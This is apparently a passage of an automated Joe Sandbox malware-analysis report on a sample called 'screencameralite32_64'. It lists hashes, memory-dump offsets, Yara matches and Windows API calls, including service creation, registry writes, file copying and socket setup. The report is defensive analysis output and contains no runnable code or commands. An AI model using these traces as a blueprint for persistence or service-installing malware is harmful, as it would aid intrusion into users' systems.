                                                              • Opcode ID: a39a78607e1b7e9b49d26cf76cd62bac16850c1ef6e930074178e6376db2b50f
                                                              • Instruction ID: ef79e475a9d5a75557209111653984431674a70f4062a92448db2303fe327b9b
                                                              • Opcode Fuzzy Hash: a39a78607e1b7e9b49d26cf76cd62bac16850c1ef6e930074178e6376db2b50f
                                                              • Instruction Fuzzy Hash: BD019671614606AFDB04CF59D885F55FBA9FF44320B148359E928872C0EB70E921CBA0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002CAA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CAA000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2caa000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              • Opcode ID: 2914780373a3d38752438f0d927385940a1590a10a9b3c5bae05785824a1306b
                                                              • Instruction ID: 99a5caaa4ddd05bb2be702e68da9dbd420cc301b1a5dc1e8d45e8ef906a32b69
                                                              • Opcode Fuzzy Hash: 2914780373a3d38752438f0d927385940a1590a10a9b3c5bae05785824a1306b
                                                              • Instruction Fuzzy Hash: 7E015EB290C6149FE7057F59E8856BAFBE4EF04350F02092DEBCA43200DA316840CBD7
                                                              APIs
                                                              • SHGetSpecialFolderPathA.SHELL32 ref: 02D056AB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002CAA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CAA000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2caa000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: FolderPathSpecial
                                                              • String ID:
                                                              • API String ID: 994120019-0
                                                              • Opcode ID: 23ddaea310f1d1ed69df8abd743bf5035c3861b4bf3d7c35e4a35559d3bc711b
                                                              • Instruction ID: 436b8f2cb25a4857dbd31d3b76c3da47c3600f5cb9800531065ac7f4332b8b19
                                                              • Opcode Fuzzy Hash: 23ddaea310f1d1ed69df8abd743bf5035c3861b4bf3d7c35e4a35559d3bc711b
                                                              • Instruction Fuzzy Hash: C201D4F3D082049BD709BA28DC19739B7E4AF10310F0A462C9FD503390F53559508AC6
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02C7E489
                                                                • Part of subcall function 02C726DB: RtlEnterCriticalSection.NTDLL(?), ref: 02C72706
                                                                • Part of subcall function 02C726DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02C7272B
                                                                • Part of subcall function 02C726DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02C95A93), ref: 02C72738
                                                                • Part of subcall function 02C726DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02C72778
                                                                • Part of subcall function 02C726DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02C727D9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                              • String ID:
                                                              • API String ID: 4293676635-0
                                                              • Opcode ID: 6cd135e9d30e1dd1def61941decad818ebb3c4c2defd10d1f8ddfa7e7767f1d8
                                                              • Instruction ID: 415710ab1680f375ba9e274cb6ab7e7778ea7c07acf6d8c64e0824b79504b779
                                                              • Opcode Fuzzy Hash: 6cd135e9d30e1dd1def61941decad818ebb3c4c2defd10d1f8ddfa7e7767f1d8
                                                              • Instruction Fuzzy Hash: 0901CEB0910B049FCB18DF4AC148986FBF5EF88300B15C5AE944A9B721E3719A40CF90
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002CAA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CAA000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2caa000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: e120e130a150bbe5ea02f94ebf5462b09188429d9d0b091e4f7d3cc9a9006408
                                                              • Instruction ID: 00c6f5fb75cd29838f74ec8a7eb2706aedde9fbd30e1dc7897d7b3fa97c51f12
                                                              • Opcode Fuzzy Hash: e120e130a150bbe5ea02f94ebf5462b09188429d9d0b091e4f7d3cc9a9006408
                                                              • Instruction Fuzzy Hash: 08F030B145C3189BE6613E09ACC56BAFB98EB04710F45092DD7D542B40FA755548C6CB
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02C7E268
                                                                • Part of subcall function 02C83A8F: _malloc.LIBCMT ref: 02C83AA7
                                                                • Part of subcall function 02C7E484: __EH_prolog.LIBCMT ref: 02C7E489
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog$_malloc
                                                              • String ID:
                                                              • API String ID: 4254904621-0
                                                              • Opcode ID: 9c12f3e90a662286708f2b1b454525e4969013801b745267009d4127014be01c
                                                              • Instruction ID: 8aa8182d98fa39bc36b6a104492f9e01097f36fcf292a0cb240a5dd464d7d54e
                                                              • Opcode Fuzzy Hash: 9c12f3e90a662286708f2b1b454525e4969013801b745267009d4127014be01c
                                                              • Instruction Fuzzy Hash: 9DE0C271A00105AFCF0DEFE8D80077D77A6EB44300F0082ADB808D2680DB708A009A40
                                                              APIs
                                                                • Part of subcall function 02C85B9A: __getptd_noexit.LIBCMT ref: 02C85B9B
                                                                • Part of subcall function 02C85B9A: __amsg_exit.LIBCMT ref: 02C85BA8
                                                                • Part of subcall function 02C833D6: __getptd_noexit.LIBCMT ref: 02C833DA
                                                                • Part of subcall function 02C833D6: __freeptd.LIBCMT ref: 02C833F4
                                                                • Part of subcall function 02C833D6: RtlExitUserThread.NTDLL(?,00000000,?,02C833B6,00000000), ref: 02C833FD
                                                              • __XcptFilter.LIBCMT ref: 02C833C2
                                                                • Part of subcall function 02C88CD4: __getptd_noexit.LIBCMT ref: 02C88CD8
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                              • String ID:
                                                              • API String ID: 1405322794-0
                                                              • Opcode ID: 16379fe85eac09f0df57849f5406f5e26594666458b35842b3fe265fecea8cf8
                                                              • Instruction ID: c31d27f64aef10fb3aa3a534709f44553900520f569099c8131dc14454eacdb5
                                                              • Opcode Fuzzy Hash: 16379fe85eac09f0df57849f5406f5e26594666458b35842b3fe265fecea8cf8
                                                              • Instruction Fuzzy Hash: 0CE0CDB0944604DFE704FBA0C904F6E3775EF04306F104144F1015B160DBB45D00EF20
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: CopyFile
                                                              • String ID:
                                                              • API String ID: 1304948518-0
                                                              • Opcode ID: c80859e274c478dfa6e1f9996ee4d2975acd961fd9ba67dcf724da2b47d5e5f0
                                                              • Instruction ID: 70b371a033703653281f259fcd844cb08ef208c609ff37fc1cc288b0b4255224
                                                              • Opcode Fuzzy Hash: c80859e274c478dfa6e1f9996ee4d2975acd961fd9ba67dcf724da2b47d5e5f0
                                                              • Instruction Fuzzy Hash: F1D022A504D3809ED6025B201B8C3252F10DF42B80F3948FFA182640E2E0F5890A422F
                                                              APIs
                                                              • RegSetValueExA.KERNELBASE(?), ref: 0040D714
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID:
                                                              • API String ID: 3702945584-0
                                                              • Opcode ID: 7cfcfd845b63692642ee728ddec84ae6ccc6688a6309fcf0ddccbdc82c853a59
                                                              • Instruction ID: 40b99f5f948a784571848aa1c94b1b8c68263b2ec4a3c8425a15f76ca6a5eda2
                                                              • Opcode Fuzzy Hash: 7cfcfd845b63692642ee728ddec84ae6ccc6688a6309fcf0ddccbdc82c853a59
                                                              • Instruction Fuzzy Hash: B9D0A920D082C0AFCB0607D48828AA93F71AF46308F1A00E6D8C03B0A1D7342A1AAB1A
                                                              APIs
                                                              • CreateDirectoryA.KERNELBASE ref: 00402339
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectory
                                                              • String ID:
                                                              • API String ID: 4241100979-0
                                                              • Opcode ID: 264699075810cdabafd5ad31d9c7e174547870aca9d41a387be5e20bfebd3682
                                                              • Instruction ID: 12ba905f8d1cec1102c480f75e379db18e70fc4006b27fc2fb6838e4bde7f859
                                                              • Opcode Fuzzy Hash: 264699075810cdabafd5ad31d9c7e174547870aca9d41a387be5e20bfebd3682
                                                              • Instruction Fuzzy Hash: EDC0927A4CA122F7C10236D00F1DD7EA1286D4A789330823BBA43B10E148FC040B27BF
                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000002), ref: 0040DA69
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID:
                                                              • API String ID: 71445658-0
                                                              • Opcode ID: 3394b502d584bdc2643820a07b976905c9a03ec5a6ebf42ae4f315c27fa9a5da
                                                              • Instruction ID: 0647171bf81c0a35a48e7d2f82fb6cdb99f617da17ae68af8b21ccd2a0036f7b
                                                              • Opcode Fuzzy Hash: 3394b502d584bdc2643820a07b976905c9a03ec5a6ebf42ae4f315c27fa9a5da
                                                              • Instruction Fuzzy Hash: A8C04C31A08106D9E6046AF14F0C7762664A700344F20497B9412F11D6E679C5199D2A
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: ManagerOpen
                                                              • String ID:
                                                              • API String ID: 1889721586-0
                                                              • Opcode ID: 4e4517bbe1b24a8a91853d59894c6f80a0f70b12f06112a3e3c0f658ca8be128
                                                              • Instruction ID: 21034c6f953c316f3885cc87d21adc9003843de77c3b84c07598952970009528
                                                              • Opcode Fuzzy Hash: 4e4517bbe1b24a8a91853d59894c6f80a0f70b12f06112a3e3c0f658ca8be128
                                                              • Instruction Fuzzy Hash: 4FB092B0808146EEC7906FA04F9842A39AB5A00309330187B9203B50D1DA385A4EB62E
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: CopyFile
                                                              • String ID:
                                                              • API String ID: 1304948518-0
                                                              • Opcode ID: dee4f487340a6766566238a3d42de1ed83d5bb05a557f6b7069183f0183d2b7c
                                                              • Instruction ID: 499f03a521c9de79cdc872d2b410aaeb712ec3cc0a8ab2da6cfe140534fd9d4b
                                                              • Opcode Fuzzy Hash: dee4f487340a6766566238a3d42de1ed83d5bb05a557f6b7069183f0183d2b7c
                                                              • Instruction Fuzzy Hash: 72900231204101AAD2010A616B4C625276C65046C131548BD6447E0090DA75804D6519
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002CAA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CAA000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2caa000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: 193197e5e743ba29d5fb2aa05fa730d418fa64b72fa7166c21fb05587129ced9
                                                              • Instruction ID: 00fe2495c4cab35b6951f861d0cdb6de6cc72c120ca7bbf937ab1b7a4e64ae77
                                                              • Opcode Fuzzy Hash: 193197e5e743ba29d5fb2aa05fa730d418fa64b72fa7166c21fb05587129ced9
                                                              • Instruction Fuzzy Hash: 0E21C1B260C704AFE7057F1AD88567AFBE9EF84360F16453DE6C043750EA7118008AD7
                                                              APIs
                                                                • Part of subcall function 02C81550: OpenEventA.KERNEL32(00100002,00000000,00000000,AB81015D), ref: 02C815F0
                                                                • Part of subcall function 02C81550: CloseHandle.KERNEL32(00000000), ref: 02C81605
                                                                • Part of subcall function 02C81550: ResetEvent.KERNEL32(00000000,AB81015D), ref: 02C8160F
                                                                • Part of subcall function 02C81550: CloseHandle.KERNEL32(00000000,AB81015D), ref: 02C81644
                                                              • TlsSetValue.KERNEL32(0000002A,?), ref: 02C820EA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseEventHandle$OpenResetValue
                                                              • String ID:
                                                              • API String ID: 1556185888-0
                                                              • Opcode ID: 56d62d307d80b512e5ea433bf37549e9902f7b28e9f1e68c1be5cbb42daae93f
                                                              • Instruction ID: a2c8483e9e33b7655476eb10e043d7a95f83c108f7dca6e8264386f6b5525456
                                                              • Opcode Fuzzy Hash: 56d62d307d80b512e5ea433bf37549e9902f7b28e9f1e68c1be5cbb42daae93f
                                                              • Instruction Fuzzy Hash: 9801A771A40244AFD710DF59DC09B5AFBECFB05674F148766F429D3380D77159108AD4
                                                              APIs
                                                              • Sleep.KERNELBASE(000003E8), ref: 0040D078
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: aadf0adffd4207228c4e515909c6380f1641a0775b5af4536e5ee83b652c7308
                                                              • Instruction ID: 5e548fb7ab6da2ad989edc3c62e08d1f74d7c1029a713ca15f1dff9923c48df2
                                                              • Opcode Fuzzy Hash: aadf0adffd4207228c4e515909c6380f1641a0775b5af4536e5ee83b652c7308
                                                              • Instruction Fuzzy Hash: F5E0C030C24516DAC3295F5043098E5F3EAEF6030F724423BD0C5620A5CB3F880E970D
                                                              APIs
                                                              • Sleep.KERNELBASE(000007D0), ref: 0040D7F6
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: d6af40f90f6f24da7965e3d662e16d8d85c227cb84fcfeeca494bb8f810967c9
                                                              • Instruction ID: 95698282a771cf8c2d5b071cc69c7d75171703a13bacb1c05b36bc99e324acdb
                                                              • Opcode Fuzzy Hash: d6af40f90f6f24da7965e3d662e16d8d85c227cb84fcfeeca494bb8f810967c9
                                                              • Instruction Fuzzy Hash: E4C09221E4C700D6D20427E0BF09B3636207704700F20407BA20B358E086FE088FBE5F
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: c6a60270b8e28d9728a4e7ec214e74dec6b2a8af5137268f6087fccacc8210d6
                                                              • Instruction ID: 9e33676bebf5a9f86b2d7b0b5c75c752ad2a1165aff3954d7e3c2dd03e025ee9
                                                              • Opcode Fuzzy Hash: c6a60270b8e28d9728a4e7ec214e74dec6b2a8af5137268f6087fccacc8210d6
                                                              • Instruction Fuzzy Hash: 82B09239C08112EFC7010BE08A444A8BA70A608344B214476E50B72650C67A046EEBC9
                                                              APIs
                                                              • Sleep.KERNELBASE(000003E8), ref: 0040D078
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 7daa125a26a21f78a8b27c639dbc3d80bb76cd022e02cd6cfad359122f364c38
                                                              • Instruction ID: d53b115fe0d181cc27964db1f0aa0a236f99de23052327716f8212fa40a04af9
                                                              • Opcode Fuzzy Hash: 7daa125a26a21f78a8b27c639dbc3d80bb76cd022e02cd6cfad359122f364c38
                                                              • Instruction Fuzzy Hash: 37A01230400A00EBD20207A09F0C938B620B7803007050114A101600D08F771A159605
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: lstrcmpi
                                                              • String ID:
                                                              • API String ID: 1586166983-0
                                                              • Opcode ID: 85197591efaf6c4ef958f8877b96260a9cb0177868e8e303a5111db251aa74e7
                                                              • Instruction ID: 2b37e35be038651bb106ddacab2bdfec67dcb5ccea7b1607ba3ff3e9580a0dcc
                                                              • Opcode Fuzzy Hash: 85197591efaf6c4ef958f8877b96260a9cb0177868e8e303a5111db251aa74e7
                                                              • Instruction Fuzzy Hash: 2BA00260A45201DAE2011BF65A0922975686B08781322543A5883F4596DA3C904E757F
                                                              APIs
                                                              • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040D81D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: CtrlDispatcherServiceStart
                                                              • String ID: test
                                                              • API String ID: 3789849863-3632233996
                                                              • Opcode ID: b4703219194672e836a57f9c111fe05c68ff65f0644c12e0ddc6a7d53bd2cadf
                                                              • Instruction ID: 5e2ed62b1568fb5829ac5ab783f16d9695f139a98fe15ea9ab6e1ab298a1a068
                                                              • Opcode Fuzzy Hash: b4703219194672e836a57f9c111fe05c68ff65f0644c12e0ddc6a7d53bd2cadf
                                                              • Instruction Fuzzy Hash: 7DE04F74D08205EDDB00AAD089086797764AB05304B30C077905BB62C0C67C090EBA5E
                                                              APIs
                                                              • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02C808E2
                                                              • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02C808EA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorFormatLastMessage
                                                              • String ID:
                                                              • API String ID: 3479602957-0
                                                              • Opcode ID: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
                                                              • Instruction ID: d4d064df97a452672b1bacfdaa04cb4fdbbf8bd64116e9af07039794f06da92c
                                                              • Opcode Fuzzy Hash: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
                                                              • Instruction Fuzzy Hash: ADF03A30308341DFEB24DE25C851B2EBBE4ABDD758F50492CF596A2191D770E289CB6A
                                                              APIs
                                                              • lstrcmpiW.KERNEL32 ref: 0040D099
                                                              • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040D81D
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: CtrlDispatcherServiceStartlstrcmpi
                                                              • String ID:
                                                              • API String ID: 369133424-0
                                                              • Opcode ID: ad95d376a052c66c4df7301868e7cf627dd00d74c87b1fe109da6e298210d1cd
                                                              • Instruction ID: abfbff957f0500a12d46b6cabf17c867691dbbcbb126cbdf920e6a8dbb637fc2
                                                              • Opcode Fuzzy Hash: ad95d376a052c66c4df7301868e7cf627dd00d74c87b1fe109da6e298210d1cd
                                                              • Instruction Fuzzy Hash: 70E09235C08141CAC7046BA16E692BD7F78AB06340B11D077C4DAB10D3D63C440AFA2E
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,02C84DD6,?,?,?,00000001), ref: 02C8946D
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 02C89476
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: 1a35e545fcdd7ce6d211a4139433f6f301e357614141987fb83279596392c0db
                                                              • Instruction ID: bb40a6c4e44e3296aaf30dd42756a991ba29b9031ed625d4baf140448cd7d125
                                                              • Opcode Fuzzy Hash: 1a35e545fcdd7ce6d211a4139433f6f301e357614141987fb83279596392c0db
                                                              • Instruction Fuzzy Hash: 6FB09271499208EBCB012B91EC0DB89BF28EB04662F005910F60E440508B6255349AE1
                                                              APIs
                                                              • CreateServiceA.ADVAPI32(?,?,?,000F01FF), ref: 0040D7A3
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: CreateService
                                                              • String ID:
                                                              • API String ID: 1592570254-0
                                                              • Opcode ID: ba92f71196b100ceb44ed589b1179bb0f9da9b7baf43ea598d5fa8f551fb2b11
                                                              • Instruction ID: 8e24f434b11aa1d90725e2ccb6fb34d412bc3e027f77b6fa946a5b0084b0e7c2
                                                              • Opcode Fuzzy Hash: ba92f71196b100ceb44ed589b1179bb0f9da9b7baf43ea598d5fa8f551fb2b11
                                                              • Instruction Fuzzy Hash: 66B01220684602A9C9101BA04ECCC27242C65C1B05370043DB606F14D0C9FC404DF129
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                              • Instruction ID: 33380389c849835052ee763cfbf4b8d852b1fc79c458acf1e63ed2a350b394d8
                                                              • Opcode Fuzzy Hash: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                              • Instruction Fuzzy Hash: 6CF082B1904309AAD714DF95D942B9DFBB9EB84314F208169D508A7340F6707A119B94
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02C724E6
                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02C724FC
                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02C7250E
                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02C7256D
                                                              • SetLastError.KERNEL32(00000000,?,74DEDFB0), ref: 02C7257F
                                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,74DEDFB0), ref: 02C72599
                                                              • GetLastError.KERNEL32(?,74DEDFB0), ref: 02C725A2
                                                              • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C725F0
                                                              • InterlockedDecrement.KERNEL32(00000002), ref: 02C7262F
                                                              • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02C7268E
                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C72699
                                                              • InterlockedExchange.KERNEL32(00000000,00000001), ref: 02C726AD
                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,74DEDFB0), ref: 02C726BD
                                                              • GetLastError.KERNEL32(?,74DEDFB0), ref: 02C726C7
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                              • String ID:
                                                              • API String ID: 1213838671-0
                                                              • Opcode ID: 89bc7cccff6ff639ba0199129f1d874732475b9bb3bfc38ac1d08c70700662b4
                                                              • Instruction ID: 36af700a5895600314b6925bfd59fa3bcbeeed247b032e839b4a3a849d650b54
                                                              • Opcode Fuzzy Hash: 89bc7cccff6ff639ba0199129f1d874732475b9bb3bfc38ac1d08c70700662b4
                                                              • Instruction Fuzzy Hash: 666141B1901209EFCB11DFA4C588AEEFBB9FF48314F10556AE916E3240D7309A18CFA1
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02C74608
                                                                • Part of subcall function 02C83A8F: _malloc.LIBCMT ref: 02C83AA7
                                                              • htons.WS2_32(?), ref: 02C74669
                                                              • htonl.WS2_32(?), ref: 02C7468C
